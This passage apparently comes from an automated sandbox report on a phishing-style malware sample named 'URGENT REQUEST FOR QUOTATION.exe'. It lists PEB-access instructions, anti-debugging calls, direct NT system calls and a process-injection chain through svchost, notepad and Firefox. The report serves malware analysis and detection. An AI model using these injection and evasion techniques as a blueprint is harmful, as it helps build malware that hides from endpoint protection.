            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]1_2_03204B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]1_2_0315EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]1_2_0315EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]1_2_031F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]1_2_031F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]1_2_03128B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]1_2_031DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]1_2_031E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]1_2_031E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]1_2_031C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]1_2_031C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]1_2_031FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]1_2_031D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]1_2_0312CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]1_2_03140BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]1_2_03140BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]1_2_031E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]1_2_031E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]1_2_031DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]1_2_0315EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]1_2_031BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]1_2_031BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]1_2_03154A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]1_2_03154A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]1_2_0316CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]1_2_0315EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]1_2_03140A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]1_2_03140A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]1_2_031ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]1_2_031ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]1_2_031DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]1_2_03168A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]1_2_03204A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]1_2_03138AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]1_2_03138AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]1_2_03186AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]1_2_03130AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]1_2_03164AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]1_2_03164AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]1_2_0316AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]1_2_0316AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]1_2_031BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]1_2_03128918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]1_2_03128918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]1_2_031AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]1_2_031AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]1_2_031B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]1_2_031C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]1_2_031B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]1_2_03204940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]1_2_031D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]1_2_031D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]1_2_031BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]1_2_0317096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]1_2_031B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]1_2_031B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]1_2_031B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]1_2_031309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]1_2_031309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]1_2_031649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]1_2_031FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]1_2_031C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]1_2_031629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]1_2_031629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]1_2_031BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]1_2_031BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]1_2_0316A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]1_2_031D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]1_2_031D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]1_2_03160854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134859 mov eax, dword ptr fs:[00000030h]1_2_03134859
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00090B62
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00062622
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0005083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0005083F
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000509D5 SetUnhandledExceptionFilter,0_2_000509D5
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00050C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00050C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\notepad.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 4076Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeThread APC queued: target process: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeJump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 26E9008Jump to behavior
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00091201
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00072BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00072BA5
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009B226 SendInput,keybd_event,0_2_0009B226
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_000B22DA
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exe"Jump to behavior
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeProcess created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"Jump to behavior
